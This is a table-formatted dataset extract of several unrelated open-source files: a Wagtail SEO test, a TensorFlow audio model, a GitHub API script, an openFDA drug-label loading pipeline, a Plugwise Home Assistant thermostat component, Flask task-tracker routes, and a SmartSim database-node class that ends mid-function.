max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
tests/unit/test_wagtail_hooks.py | LUKKIEN/wagtail-marketing-addons | 16 | 12760251 | <gh_stars>10-100
import pytest
from django.utils.html import format_html
from wagtail.core.models import Page
from tests.factories.page import PageFactory
from wagtail_marketing.helpers import SeoHelper
from wagtail_marketing.wagtail_hooks import SeoListingAdmin
@pytest.mark.django_db
class TestSeoListingAdmin:
def setup(self):
self.seolist = SeoListingAdmin()
def test_seo_helper(self):
page = PageFactory()
result = self.seolist.seo_helper(page)
assert isinstance(result, SeoHelper)
assert result.seo_title == page.seo_title
assert result.search_description == page.search_description
assert result.page_title == page.title
def test_admin_display_title(self):
page = PageFactory()
result = self.seolist.admin_display_title(page)
assert result == 'Title'
def test_search_engine(self):
page = PageFactory()
result = self.seolist.search_engine(page)
assert result == format_html(
'<strong>{}</strong><p>{}</p>',
page.seo_title,
page.search_description
)
def test_score(self):
page = PageFactory()
result = self.seolist.score(page)
assert result == format_html('<span style="font-size: 28px;">{}</span>', '😱')
def test_get_queryset_root(self, client):
Page.objects.all().delete()
page = PageFactory(depth=1)
page.save()
result = self.seolist.get_queryset(client.request())
assert len(result) == 0
def test_get_queryset(self, client):
Page.objects.all().delete()
page = PageFactory()
result = self.seolist.get_queryset(client.request())
assert len(result) == 1
assert result[0] == page
| 2.25 | 2 |
model.py | MeetDevin/WebCrawler | 3 | 12760252 | # coding: utf-8
# ---
# @File: model.py
# @description: 模型类
# @Author: <NAME>
# @E-mail: <EMAIL>
# @Time: 3月18, 2019
# ---
import tensorflow as tf
from PIL import Image
import scipy.misc
import os
from linear_3d_layer import Linear3DLayer
class Model_X(tf.keras.Model):
"""
继承自基类 tf.keras.Model
"""
def __init__(self, rnn_units, num_class):
super(Model_X, self).__init__()
self.rnn_units = rnn_units
self.num_class = num_class
self.i = 0
# 线性层
self.lcl1 = Linear3DLayer(filters=8, kernel_size=[1, 3, 75, 6],
activate_size=[3, 1, 2], activate_stride=[3, 1, 1])
self.lcl2 = Linear3DLayer(filters=8, kernel_size=[8, 3, 36, 3],
activate_size=[3, 1, 2], activate_stride=[3, 1, 1])
self.lcl3 = Linear3DLayer(filters=8, kernel_size=[8, 3, 17, 2],
activate_size=[3, 1, 1], activate_stride=[3, 1, 1])
# 池化层
self.pooling1 = tf.keras.layers.MaxPool3D(pool_size=[2, 2, 2], strides=[2, 2, 2], padding='same',
data_format='channels_first')
self.pooling2 = tf.keras.layers.MaxPool3D(pool_size=[2, 2, 2], strides=[2, 2, 2], padding='same',
data_format='channels_first')
self.pooling3 = tf.keras.layers.MaxPool3D(pool_size=[2, 2, 2], strides=[2, 2, 2], padding='same',
data_format='channels_first')
# 3DCNN
# self.conv3d1 = tf.keras.layers.Conv3D(filters=32, kernel_size=[3, 78, 6], strides=[1, 1, 6],
# use_bias=True,
# activation=tf.nn.leaky_relu, padding='same',
# kernel_initializer=tf.keras.initializers.he_normal(),
# bias_initializer=tf.zeros_initializer(),
# data_format='channels_first')
# self.conv3d2 = tf.keras.layers.Conv3D(filters=16, kernel_size=[3, 38, 3], strides=[1, 1, 3],
# use_bias=True,
# activation=tf.nn.leaky_relu, padding='same',
# kernel_initializer=tf.keras.initializers.he_normal(),
# bias_initializer=tf.zeros_initializer(),
# data_format='channels_first')
# self.conv3d3 = tf.keras.layers.Conv3D(filters=8, kernel_size=[3, 19, 2], strides=[1, 1, 2],
# use_bias=True,
# activation=tf.nn.leaky_relu, padding='same',
# kernel_initializer=tf.keras.initializers.he_normal(),
# bias_initializer=tf.zeros_initializer(),
# data_format='channels_first')
# GRU 网络
self.cell1 = tf.keras.layers.GRU(units=self.rnn_units, return_sequences=True)
self.cell2 = tf.keras.layers.GRU(units=self.num_class)
# BatchNormal
self.bn1 = tf.keras.layers.BatchNormalization()
self.bn2 = tf.keras.layers.BatchNormalization()
self.bn3 = tf.keras.layers.BatchNormalization()
# self.pooling_a = tf.keras.layers.AveragePooling2D(pool_size=[1, 1, 2], strides=[1, 1, 2], padding='same',
# data_format='channels_first')
# drop = tf.keras.layers.Dropout(rate=drop_rate)
# FC
# self.fla = tf.keras.layers.Flatten(data_format='channels_last')
# self.fc1 = tf.keras.layers.Dense(units=128, use_bias=True, activation=None,
# kernel_initializer=tf.keras.initializers.he_normal(),
# bias_initializer=tf.constant_initializer)
# self.fc2 = tf.keras.layers.Dense(units=num_class, use_bias=True, activation=None,
# kernel_initializer=tf.keras.initializers.he_normal(),
# bias_initializer=tf.constant_initializer)
def call(self, inputs, drop_rate=0.3, **kwargs):
"""
组织了三层时频帧线性层,两层GRU,然后输出GRU的最后一个时间状态作为logits,其中串联了 BatchNormal
:param drop_rate: Dropout的比例=0.3,这个超参数没用到
:param inputs: [?, 1, 200, 80, 4]
:return: logits
"""
is_training = tf.equal(drop_rate, 0.3)
# print('inputs ', np.shape(inputs))
lc1 = self.lcl1(inputs)
# print('conv1: ', sc1.get_shape().as_list())
lc1 = self.bn1(lc1, training=is_training)
pool1 = self.pooling1(lc1) # (?, filters, 99, 39, 4)
# print('pool1: ', pool1.get_shape().as_list())
lc2 = self.lcl2(pool1)
lc2 = self.bn2(lc2, training=is_training)
pool2 = self.pooling2(lc2) # (?, filters, 49, 19, 2)
# print('pool2: ', pool2.get_shape().as_list())
lc3 = self.lcl3(pool2)
lc3 = self.bn3(lc3, training=is_training)
pool3 = self.pooling3(lc3) # (?, filters, 24, 9, 1)
# pool3 = self.pooling_a(pool3)
pool3 = tf.squeeze(pool3, axis=-1) # [?, filters, 24, 9]
# print('pool3: ', pool3.get_shape().as_list())
# x_rnn = tf.squeeze(pool3, axis=2) # (?, 8, 2, 10, 5)
# x_rnns = tf.unstack(pool3, axis=2) # 展开帧维度 2*[?, 8, 10, 5]
# x_rnn = tf.concat(x_rnns, axis=3) # 合并到行维度 [?, 8, 10, 10]
if not is_training:
# self.draw_hid_features(inputs, pool3)
pass
##################################################################
x_rnns = tf.unstack(pool3, axis=1) # 展开通道维度 filters*[?, 17, 10]
x_rnn = tf.concat(x_rnns, axis=2) # 合并到列维度 [?, 17, filters*10=80]
# x_rnn = tf.transpose(x_rnn, [0, 2, 1]) # [?, 10, 80]
# rnn_output = []
# for i in range(self.num_class):
# name = "ltsm_" + str(i)
# cell = tf.keras.layers.CuDNNLSTM(units=self.rnn_units, name=name)
# fc = tf.keras.layers.Dense(units=1, use_bias=True, activation=None,
# kernel_initializer=tf.keras.initializers.he_normal(),
# bias_initializer=tf.constant_initializer())
# drop = tf.keras.layers.Dropout(rate=drop_rate)
#
# item_out = cell(inputs=x_rnn) # [?, 64]
# fc_out = drop(item_out)
# fc_out2 = fc(fc_out) # [?, 1]
# cell = None
# drop = None
# fc = None
#
# rnn_output.append(fc_out2) # [4, ?, 1]
# rnn_output = tf.squeeze(rnn_output) # [4, ?]
# logits = tf.transpose(rnn_output) # [?, 4]
####################################################################
# rnn_output = []
# for _index in range(4):
# name = "gru_" + str(_index)
# cell = tf.keras.layers.CuDNNLSTM(units=32, name=name)
# item_out = cell(inputs=x_rnns[_index]) # [?, 25, rnn_units]
# cell = None
#
# rnn_output.append(item_out)
#
# output = tf.concat(rnn_output, 1) # [?, self.rnn_units*4]
# drop = tf.keras.layers.Dropout(rate=drop_rate)(output)
# logits = self.fc2(drop)
####################################################################
# drop = tf.keras.layers.Dropout(rate=drop_rate)
# fla = self.fla(x_rnn)
# fc1 = self.fc1(fla)
# fc1 = drop(fc1)
# logits = self.fc2(fc1)
####################################################################
cell_out1 = self.cell1(x_rnn)
logits = self.cell2(cell_out1)
return logits
def draw_hid_features(self, inputs, batch):
"""
绘制中间层的特征图,保存在本地/hid_pic,第120-121行调用
:param inputs: [?, 1, 100, 80, 6]
:param batch: [?, 8, 13, 10]
"""
import numpy
inputs = numpy.squeeze(inputs) # [?, 100, 80, 6]
batch = batch.numpy()
index_sample = 0
for sample in batch:
# [8, 13, 10]
index_channel = 0
yuan_tus = inputs[index_sample]
yuan_tu = numpy.hstack(yuan_tus)
save_dir = 'hid_pic' + '/batch_' + str(self.i) + '/' + str(index_sample)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
Image.fromarray(yuan_tu).convert('RGB').save(save_dir + '/' + 'yuan_tu.jpg')
for feature in sample:
# [13, 10]
save_path = save_dir + '/' + str(index_channel) + '.jpg'
scipy.misc.imsave(save_path, feature.T)
# Image.fromarray(feature).convert('RGB').save(save_path)
index_channel += 1
index_sample += 1
self.i += 1
############
# 8 16 8
| 2.75 | 3 |
Python/fetch_github_info.py | Brabec/Hacktoberfest2020 | 0 | 12760253 | <filename>Python/fetch_github_info.py
import requests
_GITHUB_API = "https://api.github.com/user"
def fetch_github_info(auth_user, auth_pass):
"""
Fetch GitHub info of a user using the requests module
"""
return requests.get(_GITHUB_API, auth=(auth_user, auth_pass)).json()
if __name__ == "__main__":
for key, value in fetch_github_info("<USERNAME>", "<PASSWORD>").items():
print(key,value)
| 3.359375 | 3 |
openfda/spl/pipeline.py | rkhaja/openFDA | 0 | 12760254 | #!/usr/bin/python
''' A pipeline for loading SPL data into ElasticSearch
'''
import collections
import csv
import glob
import logging
import os
from os.path import basename, join, dirname
import simplejson as json
import sys
import time
import arrow
import elasticsearch
import luigi
from openfda import common, elasticsearch_requests, index_util, parallel
from openfda.annotation_table.pipeline import CombineHarmonization
from openfda.index_util import AlwaysRunTask
from openfda.spl import annotate
from openfda.parallel import IdentityReducer
RUN_DIR = dirname(dirname(os.path.abspath(__file__)))
BASE_DIR = './data'
META_DIR = join(BASE_DIR, 'spl/meta')
# Ensure meta directory is available for task tracking
common.shell_cmd('mkdir -p %s', META_DIR)
SPL_JS = join(RUN_DIR, 'spl/spl_to_json.js')
LOINC = join(RUN_DIR, 'spl/data/sections.csv')
SPL_S3_BUCKET = 's3://openfda.spl.data/data/'
SPL_S3_LOCAL_DIR = join(BASE_DIR, 'spl/s3_sync')
SPL_S3_CHANGE_LOG = join(SPL_S3_LOCAL_DIR, 'change_log/SPLDocuments.csv')
SPL_BATCH_DIR = join(META_DIR, 'batch')
SPL_PROCESS_DIR = join(BASE_DIR, 'spl/batches')
common.shell_cmd('mkdir -p %s', SPL_S3_LOCAL_DIR)
common.shell_cmd('mkdir -p %s', SPL_PROCESS_DIR)
ES_HOST = luigi.Parameter('localhost:9200', is_global=True)
SPL_S3_PROFILE = luigi.Parameter(default='openfda', is_global=True)
class SyncS3SPL(AlwaysRunTask):
profile = SPL_S3_PROFILE
bucket = SPL_S3_BUCKET
local_dir = SPL_S3_LOCAL_DIR
def _run(self):
common.cmd(['aws',
'--profile=' + self.profile,
's3',
'sync',
self.bucket,
self.local_dir])
class CreateBatchFiles(AlwaysRunTask):
batch_dir = SPL_BATCH_DIR
change_log_file = SPL_S3_CHANGE_LOG
def requires(self):
return SyncS3SPL()
def output(self):
return luigi.LocalTarget(self.batch_dir)
def _run(self):
output_dir = self.output().path
common.shell_cmd('mkdir -p %s', output_dir)
change_log = csv.reader(open(self.change_log_file, 'r'))
batches = collections.defaultdict(list)
for row in change_log:
spl_id, spl_type, spl_date = row
# Only grab the human labels for this index
if spl_type.lower().find('human') != -1:
# All blank dates to be treated as the week of June 1, 2009
if not spl_date:
spl_date = '20090601120000'
date = arrow.get(spl_date, 'YYYYMMDDHHmmss')
batches[date.ceil('week')].append(spl_id)
for batch_date, ids in batches.items():
batch_file = '%s.ids' % batch_date.format('YYYYMMDD')
batch_out = open(join(output_dir, batch_file), 'w')
unique_ids = list(set(ids))
batch_out.write('\n'.join(unique_ids))
class SPL2JSONMapper(parallel.Mapper):
spl_path = SPL_S3_LOCAL_DIR
def map(self, _, value, output):
value = value.strip()
xml_file = join(self.spl_path, value, value + '.xml')
if not os.path.exists(xml_file):
logging.info('File does not exist, skipping %s', xml_file)
return
spl_js = SPL_JS
loinc = LOINC
cmd = 'node %(spl_js)s %(xml_file)s %(loinc)s' % locals()
json_str = os.popen(cmd).read()
json_obj = json.loads(json_str)
output.add(xml_file, json_obj)
class SPL2JSON(luigi.Task):
batch = luigi.Parameter()
def requires(self):
return CreateBatchFiles()
def output(self):
weekly = self.batch.split('/')[-1].split('.')[0]
dir_name = join(SPL_PROCESS_DIR, weekly)
return luigi.LocalTarget(join(dir_name, 'json.db'))
def run(self):
parallel.mapreduce(
parallel.Collection.from_glob(self.batch, parallel.LineInput),
mapper=SPL2JSONMapper(),
reducer=parallel.IdentityReducer(),
output_prefix=self.output().path)
class AnnotateJSON(luigi.Task):
batch = luigi.Parameter()
def requires(self):
return [SPL2JSON(self.batch), CombineHarmonization()]
def output(self):
output_dir = self.input()[0].path.replace('json.db', 'annotated.db')
return luigi.LocalTarget(output_dir)
def run(self):
input_db = self.input()[0].path
harmonized_file = self.input()[1].path
parallel.mapreduce(
input_collection=parallel.Collection.from_sharded(input_db),
mapper=annotate.AnnotateMapper(harmonized_file),
reducer=parallel.IdentityReducer(),
output_prefix=self.output().path,
num_shards=1,
map_workers=1)
class ResetElasticSearch(AlwaysRunTask):
es_host = ES_HOST
def _run(self):
es = elasticsearch.Elasticsearch(self.es_host)
elasticsearch_requests.load_mapping(
es, 'druglabel.base', 'spl', './schemas/spl_mapping.json')
class LoadJSON(luigi.Task):
batch = luigi.Parameter()
es_host = ES_HOST
epoch = time.time()
def requires(self):
return [ResetElasticSearch(), AnnotateJSON(self.batch)]
def output(self):
return luigi.LocalTarget(self.batch.replace('.ids', '.done')\
.replace('batch', 'complete'))
def run(self):
# Since we only iterate over dates in the umbrella process, we need to
# skip batch files that do not exist
output_file = self.output().path
if not os.path.exists(self.batch):
common.shell_cmd('touch %s', output_file)
return
input_file = self.input()[1].path
es = elasticsearch.Elasticsearch(self.es_host)
index_util.start_index_transaction(es, 'druglabel', self.epoch)
parallel.mapreduce(
input_collection=parallel.Collection.from_sharded(input_file),
mapper=index_util.LoadJSONMapper(self.es_host,
'druglabel',
'spl',
self.epoch,
docid_key='set_id',
version_key='version'),
reducer=parallel.NullReducer(),
output_prefix='/tmp/loadjson.druglabel',
num_shards=1,
map_workers=1)
index_util.commit_index_transaction(es, 'druglabel')
common.shell_cmd('touch %s', output_file)
class ProcessBatch(luigi.Task):
def requires(self):
start = arrow.get('20090601', 'YYYYMMDD').ceil('week')
end = arrow.utcnow().ceil('week')
for batch in arrow.Arrow.range('week', start, end):
batch_file = join(SPL_BATCH_DIR, batch.format('YYYYMMDD') + '.ids')
yield LoadJSON(batch_file)
if __name__ == '__main__':
fmt_string = '%(created)f %(filename)s:%(lineno)s [%(funcName)s] %(message)s'
logging.basicConfig(stream=sys.stderr,
format=fmt_string,
level=logging.INFO)
# elasticsearch is too verbose by default (logs every successful request)
logging.getLogger('elasticsearch').setLevel(logging.WARN)
luigi.run(main_task_cls=ProcessBatch)
| 1.898438 | 2 |
custom_components/plugwise/climate.py | geijt/plugwise-beta | 0 | 12760255 | <filename>custom_components/plugwise/climate.py
"""Plugwise Climate component for Home Assistant."""
import logging
from plugwise.exceptions import PlugwiseException
from homeassistant.components.climate import ClimateEntity, ClimateEntityDescription
from homeassistant.components.climate.const import (
CURRENT_HVAC_COOL,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_HOME,
PRESET_NONE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import ATTR_NAME, ATTR_TEMPERATURE, TEMP_CELSIUS
from homeassistant.core import callback
from .const import (
API,
CLIMATE_DOMAIN,
COORDINATOR,
DEFAULT_MAX_TEMP,
DEFAULT_MIN_TEMP,
DOMAIN,
FW,
MASTER_THERMOSTATS,
PW_CLASS,
PW_LOCATION,
PW_MODEL,
SCHEDULE_OFF,
SCHEDULE_ON,
VENDOR,
)
from .gateway import SmileGateway
from .smile_helpers import GWThermostat
HVAC_MODES_HEAT_ONLY = [HVAC_MODE_HEAT, HVAC_MODE_AUTO, HVAC_MODE_OFF]
HVAC_MODES_HEAT_COOL = [HVAC_MODE_HEAT, HVAC_MODE_COOL, HVAC_MODE_AUTO, HVAC_MODE_OFF]
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Smile Thermostats from a config entry."""
api = hass.data[DOMAIN][config_entry.entry_id][API]
coordinator = hass.data[DOMAIN][config_entry.entry_id][COORDINATOR]
entities = []
for dev_id in coordinator.data[1]:
if coordinator.data[1][dev_id][PW_CLASS] not in MASTER_THERMOSTATS:
continue
thermostat = PwThermostat(
api,
coordinator,
ClimateEntityDescription(
key=f"{dev_id}_thermostat",
name=coordinator.data[1][dev_id].get(ATTR_NAME),
),
dev_id,
DEFAULT_MAX_TEMP,
DEFAULT_MIN_TEMP,
)
entities.append(thermostat)
_LOGGER.info(
"Added climate %s entity", coordinator.data[1][dev_id].get(ATTR_NAME)
)
async_add_entities(entities, True)
class PwThermostat(SmileGateway, ClimateEntity):
"""Representation of a Plugwise (zone) thermostat."""
def __init__(
self,
api,
coordinator,
description: ClimateEntityDescription,
dev_id,
max_temp,
min_temp,
):
"""Set up the PwThermostat."""
_cdata = coordinator.data[1][dev_id]
super().__init__(
coordinator,
description,
dev_id,
_cdata.get(PW_MODEL),
description.name,
_cdata.get(VENDOR),
_cdata.get(FW),
)
self._gw_thermostat = GWThermostat(coordinator.data, dev_id)
self._api = api
self._attr_current_temperature = None
self._attr_device_class = None
self._attr_hvac_mode = None
self._attr_max_temp = max_temp
self._attr_min_temp = min_temp
self._attr_name = description.name
self._attr_preset_mode = None
self._attr_preset_modes = None
self._attr_supported_features = SUPPORT_FLAGS
self._attr_target_temperature = None
self._attr_temperature_unit = TEMP_CELSIUS
self._attr_unique_id = f"{dev_id}-{CLIMATE_DOMAIN}"
self._cor_data = coordinator.data
self._loc_id = _cdata.get(PW_LOCATION)
@property
def hvac_action(self):
"""Return the current action."""
if self._gw_thermostat.heating_state:
return CURRENT_HVAC_HEAT
if self._gw_thermostat.cooling_state:
return CURRENT_HVAC_COOL
return CURRENT_HVAC_IDLE
@property
def hvac_modes(self):
"""Return the available hvac modes list."""
if self._gw_thermostat.cooling_present:
return HVAC_MODES_HEAT_COOL
return HVAC_MODES_HEAT_ONLY
async def async_set_temperature(self, **kwargs):
"""Set new target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if (temperature is not None) and (
self._attr_min_temp < temperature < self._attr_max_temp
):
try:
await self._api.set_temperature(self._loc_id, temperature)
self._attr_target_temperature = temperature
self.async_write_ha_state()
_LOGGER.debug("Set temperature to %s ºC", temperature)
except PlugwiseException:
_LOGGER.error("Error while communicating to device")
else:
_LOGGER.error("Invalid temperature requested")
async def async_set_hvac_mode(self, hvac_mode):
"""Set the hvac mode, options are 'off', 'heat', 'cool' and 'auto'."""
state = SCHEDULE_OFF
if hvac_mode == HVAC_MODE_AUTO:
state = SCHEDULE_ON
try:
schedule_temp = self._gw_thermostat.schedule_temperature
await self._api.set_temperature(self._loc_id, schedule_temp)
self._attr_target_temperature = schedule_temp
except PlugwiseException:
_LOGGER.error("Error while communicating to device")
try:
await self._api.set_schedule_state(
self._loc_id, self._gw_thermostat.last_active_schema, state
)
# Feature request - mimic HomeKit behavior
if hvac_mode == HVAC_MODE_OFF:
preset_mode = PRESET_AWAY
await self._api.set_preset(self._loc_id, preset_mode)
self._attr_preset_mode = preset_mode
self._attr_target_temperature = self._gw_thermostat.presets.get(
preset_mode, PRESET_NONE
)[0]
if (
hvac_mode in [HVAC_MODE_HEAT, HVAC_MODE_COOL]
and self._attr_preset_mode == PRESET_AWAY
):
preset_mode = PRESET_HOME
await self._api.set_preset(self._loc_id, preset_mode)
self._attr_preset_mode = preset_mode
self._attr_target_temperature = self._gw_thermostat.presets.get(
preset_mode, PRESET_NONE
)[0]
self._attr_hvac_mode = hvac_mode
self.async_write_ha_state()
_LOGGER.debug("Set hvac_mode to %s", hvac_mode)
except PlugwiseException:
_LOGGER.error("Error while communicating to device")
async def async_set_preset_mode(self, preset_mode):
"""Set the preset mode."""
try:
await self._api.set_preset(self._loc_id, preset_mode)
self._attr_preset_mode = preset_mode
self._attr_target_temperature = self._gw_thermostat.presets.get(
preset_mode, PRESET_NONE
)[0]
self.async_write_ha_state()
_LOGGER.debug("Set preset_mode to %s", preset_mode)
except PlugwiseException:
_LOGGER.error("Error while communicating to device")
@callback
def _async_process_data(self):
"""Update the data for this climate device."""
self._gw_thermostat.update_data()
self._attr_current_temperature = self._gw_thermostat.current_temperature
self._attr_extra_state_attributes = self._gw_thermostat.extra_state_attributes
self._attr_hvac_mode = self._gw_thermostat.hvac_mode
self._attr_preset_mode = self._gw_thermostat.preset_mode
self._attr_preset_modes = self._gw_thermostat.preset_modes
self._attr_target_temperature = self._gw_thermostat.target_temperature
self.async_write_ha_state()
| 2.078125 | 2 |
blue/developer/routes.py | HishamElamir/WhackHack | 0 | 12760256 | import datetime
from flask import Blueprint, render_template, flash, redirect, request, session, abort, jsonify
from ..core.db import connect
from ..core.db.users import Users
from ..core.db.tasks import Tasks
from ..core.db.task_logs import TaskLogs
from ..core.db.task_assigns import TaskAssigns
from ..core.utils import get_config
mod = Blueprint('developer', __name__,
template_folder='templates', static_folder='static')
dbs = connect()
@mod.route('', methods=['GET', 'POST'])
@mod.route('/', methods=['GET', 'POST'])
def developer__index_dashboard():
user = Users(db=dbs)
tasks = Tasks(db=dbs)
task_logs = TaskLogs(db=dbs)
if session.get('logged_in'):
this_user = user.get_user_by_id(session['user_id'])
categories_labels, categories_count = tasks.get__count__per_category(this_user['_id'])
types_labels, types_count = tasks.get__count__per_type(this_user['_id'])
devs_stat = tasks.get__user__per_category()
if this_user['role'] == 'developer':
return render_template('dashboard.developer.html', this_user=this_user,
devs_stat=devs_stat,
categories={'key': categories_labels, 'value': categories_count},
types={'key': types_labels, 'value': types_count})
else:
return redirect('/')
else:
return redirect('/')
@mod.route('/tasklog/<task>', methods=['GET', 'POST'])
@mod.route('/tasklog/<task>/', methods=['GET', 'POST'])
def developer__task_log(task):
user = Users(db=dbs)
this_user = user.get_user_by_id(session['user_id'])
if session.get('logged_in') and this_user['role'] == 'developer':
if request.method == 'POST':
log_task = Tasks(db=dbs)
print(request.form)
log_task.fill_developer_log(request.form, task)
return redirect('/developer/')
else:
tasks = Tasks(db=dbs)
task_assigned = tasks.get_tasks__assigned__by_id(task)
print(task_assigned)
return render_template('task_log.developer.html', user_id=this_user['_id'],
task_assigned=task_assigned)
else:
return redirect('/')
@mod.route('/create-ticket', methods=['GET', 'POST'])
@mod.route('/create-ticket/', methods=['GET', 'POST'])
def developer__create_task():
user = Users(db=dbs)
task = Tasks(db=dbs)
if session.get('logged_in'):
this_user = user.get_user_by_id(session['user_id'])
else:
return redirect('/')
if this_user['role'] == 'developer':
if request.method == 'POST':
task.insert(request.form, this_user['_id'])
return render_template('create_task.developer.html', this_user=this_user)
else:
return render_template('create_task.developer.html', this_user=this_user)
else:
return redirect('/')
@mod.route('/view-ticket', methods=['GET', 'POST'])
@mod.route('/view-ticket/', methods=['GET', 'POST'])
def developer__view_task():
user = Users(db=dbs)
task = Tasks(db=dbs)
if session.get('logged_in'):
this_user = user.get_user_by_id(session['user_id'])
else:
return redirect('/')
if this_user['role'] == 'developer':
task_list = task.get_tasks__user_id(this_user['_id'])
return render_template('view_task.developer.html',
this_user=this_user, task_list=task_list)
else:
return redirect('/')
| 2.078125 | 2 |
smartsim/entity/dbnode.py | billschereriii/SmartSim | 0 | 12760257 | # BSD 2-Clause License
#
# Copyright (c) 2021-2022, Hewlett Packard Enterprise
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import os.path as osp
import time
from ..error import SmartSimError
from ..log import get_logger
from .entity import SmartSimEntity
logger = get_logger(__name__)
class DBNode(SmartSimEntity):
"""DBNode objects are the entities that make up the orchestrator.
Each database node can be launched in a cluster configuration
and take launch multiple databases per node.
To configure how each instance of the database operates, look
into the smartsimdb.conf.
"""
def __init__(self, name, path, run_settings, ports):
"""Initialize a database node within an orchestrator."""
self.ports = ports
self._host = None
super().__init__(name, path, run_settings)
self._mpmd = False
self._shard_ids = None
self._hosts = None
@property
def host(self):
if not self._host:
self._host = self._parse_db_host()
return self._host
@property
def hosts(self):
if not self._hosts:
self._hosts = self._parse_db_hosts()
return self._hosts
def set_host(self, host):
self._host = str(host)
def set_hosts(self, hosts):
self._hosts = [str(host) for host in hosts]
def remove_stale_dbnode_files(self):
"""This function removes the .conf, .err, and .out files that
have the same names used by this dbnode that may have been
created from a previous experiment execution.
"""
for port in self.ports:
if not self._mpmd:
conf_file = osp.join(self.path, self._get_cluster_conf_filename(port))
if osp.exists(conf_file):
os.remove(conf_file)
else: # cov-lsf
conf_files = [
osp.join(self.path, filename)
for filename in self._get_cluster_conf_filenames(port)
]
for conf_file in conf_files:
if osp.exists(conf_file):
os.remove(conf_file)
for file_ending in [".err", ".out", ".mpmd"]:
file_name = osp.join(self.path, self.name + file_ending)
if osp.exists(file_name):
os.remove(file_name)
if self._mpmd:
for file_ending in [".err", ".out"]:
for shard_id in self._shard_ids:
file_name = osp.join(
self.path, self.name + "_" + str(shard_id) + file_ending
)
if osp.exists(file_name):
os.remove(file_name)
def _get_cluster_conf_filename(self, port):
"""Returns the .conf file name for the given port number
:param port: port number
:type port: int
:return: the dbnode configuration file name
:rtype: str
"""
return "".join(("nodes-", self.name, "-", str(port), ".conf"))
def _get_cluster_conf_filenames(self, port): # cov-lsf
"""Returns the .conf file name for the given port number
This function should bu used if and only if ``_mpmd==True``
:param port: port number
:type port: int
:return: the dbnode configuration file name
:rtype: str
"""
return [
"".join(("nodes-", self.name + f"_{shard_id}", "-", str(port), ".conf"))
for shard_id in self._shard_ids
]
def _parse_db_host(self):
"""Parse the database host/IP from the output file
:raises SmartSimError: if host/ip could not be found
:return: ip address | hostname
:rtype: str
"""
filepath = osp.join(self.path, self.name + ".out")
trials = 5
ip = None
# try a few times to give the database files time to
# populate on busy systems.
while not ip and trials > 0:
try:
with open(filepath, "r") as f:
lines = f.readlines()
for line in lines:
content = line.split()
if "IPADDRESS:" in content:
ip = content[-1]
# suppress error
except FileNotFoundError:
pass
logger.debug("Waiting for Redis output files to populate...")
if not ip:
time.sleep(1)
trials -= 1
if not ip:
logger.error("Redis IP address lookup strategy failed.")
raise SmartSimError("Failed to obtain database hostname")
return ip
def _parse_db_hosts(self):
"""Parse the database hosts/IPs from the output files
this uses the RedisIP module that is built as a dependency
The IP address is preferred, but if hostname is only present
then a lookup to /etc/hosts is done through the socket library.
This function must be called only if ``_mpmd==True``.
:raises SmartSimError: if host/ip could not be found
:return: ip addresses | hostnames
:rtype: list[str]
"""
ips = []
# Find out if all shards' output streams are piped to different file
multiple_files = None
for _ in range(5):
filepath = osp.join(self.path, self.name + f"_{self._shard_ids[0]}.out")
if osp.isfile(filepath):
multiple_files = True
break
# If we did not find separate files for each shard, it could
# be that all outputs are piped to same file OR that the separate
# files have not been created yet. To find out whether the
# streams are piped to the same file, we search the output file
# for "IPADDRESS": if we find it, we can set multiple_files to False
# and wait until the file contains enough IPs. Otherwise we
# go to next iteration, to check if there are multiple files.
filepath = osp.join(self.path, self.name + ".out")
ips = []
try:
with open(filepath, "r") as f:
lines = f.readlines()
for line in lines:
content = line.split()
if "IPADDRESS:" in content:
ip = content[-1]
ips.append(ip)
# suppress error
except FileNotFoundError:
pass
logger.debug("Waiting for RedisIP files to populate...")
if len(ips) < len(self._shard_ids):
# Larger sleep time, as this seems to be needed for
# multihost setups
if len(ips) > 0:
# if we found at least one "IPADDRESS", we know
# output streams all go to the same file
multiple_files = False
break
else:
ips = []
time.sleep(5)
continue
else:
ips = list(dict.fromkeys(ips))
return ips
if multiple_files is None:
logger.error("RedisIP address lookup strategy failed.")
raise SmartSimError("Failed to obtain database hostname")
if multiple_files == True:
for shard_id in self._shard_ids:
trials = 5
ip = None
filepath = osp.join(self.path, self.name + f"_{shard_id}.out")
# try a few times to give the database files time to
# populate on busy systems.
while not ip and trials > 0:
try:
with open(filepath, "r") as f:
lines = f.readlines()
